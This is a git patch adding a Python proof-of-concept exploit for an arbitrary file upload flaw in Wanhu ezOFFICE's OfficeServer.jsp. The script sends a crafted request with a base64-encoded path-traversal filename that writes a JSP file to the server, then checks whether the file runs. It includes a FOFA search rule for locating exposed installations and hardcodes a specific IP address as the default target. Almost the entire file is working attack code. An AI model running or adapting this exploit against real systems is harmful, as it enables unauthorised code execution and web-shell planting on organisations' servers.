From 9329a61eace616280c0442902398631cababab38 Mon Sep 17 00:00:00 2001
From: ZiYuMis <33992514+ZiYuMis@users.noreply.github.com>
Date: Tue, 27 Sep 2022 11:41:28 +0800
Subject: [PATCH] Add files via upload

---
 Moudle/OfficeServerFileUpload.py | 52 ++++++++++++++++++++++++++++++++
 1 file changed, 52 insertions(+)
 create mode 100644 Moudle/OfficeServerFileUpload.py

diff --git a/Moudle/OfficeServerFileUpload.py b/Moudle/OfficeServerFileUpload.py
new file mode 100644
index 0000000..2c1b248
--- /dev/null
+++ b/Moudle/OfficeServerFileUpload.py
@@ -0,0 +1,52 @@
+#!/usr/bin/env python3
+# _*_ coding:utf-8 _*_
+'''
+_/_/_/_/_/                                          
+   _/      _/  _/_/    _/_/_/  _/_/_/      _/_/_/   
+  _/      _/_/      _/    _/  _/    _/  _/_/        
+ _/      _/        _/    _/  _/    _/      _/_/     
+_/      _/          _/_/_/  _/    _/  _/_/_/        
+                                               
+'''
+
+import json
+import requests
+#from Config.config_requests import ua
+
+
+# 脚本信息
+######################################################
+NAME='OfficeServerFileUpload'
+AUTHOR="Trans"
+REMARK='万户OA OfficeServer.jsp 任意文件上传漏洞'
+FOFA_RULE='app="万户网络-ezOFFICE"'
+######################################################
+
+def poc(target):
+    headers ={
+        "User-Agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36",
+        "Accept": "*/*",
+        "Accept-Encoding": "gzip, deflate"
+    }
+
+    try:
+        target2 = target+"/defaultroot/public/edit/cmd_test.jsp"
+        target += "/defaultroot/public/iWebOfficeSign/OfficeServer.jsp"
+        FileData = '<%= "hellowOrld"%>'
+        Body="DBSTEP=REJTVEVQ\r\nOPTION=U0FWRUZJTEU=\r\nRECORDID=\r\nisDoc=dHJ1ZQ==\r\nmoduleType=Z292ZG9jdW1lbnQ=\r\nFILETYPE=Li4vLi4vcHVibGljL2VkaXQvY21kX3Rlc3QuanNw\r\n111111111111111111111111111111111111111111111111\r\n"
+        Header="DBSTEP V3.0     "+str(len(Body)).ljust(16,' ') +"0               "+str(len(FileData)).ljust(16,' ')
+        r = requests.post(target ,headers = headers,data=Header+Body+FileData,verify=False,timeout=40)
+        r2 = requests.get(target2)
+        if r2.text == "hellowOrld":
+                print('[+] ' + target + ' 存在OfficeServer.jsp 任意文件上传漏洞')
+                #return ('[+] ' + target + '  存在OfficeServer.jsp 任意文件上传漏洞')
+    except Exception as e:
+         pass
+
+def pocs(target,q):
+    q.put(target)
+    return poc(target)
+
+
+if __name__ == '__main__':
+    poc("http://183.129.227.222")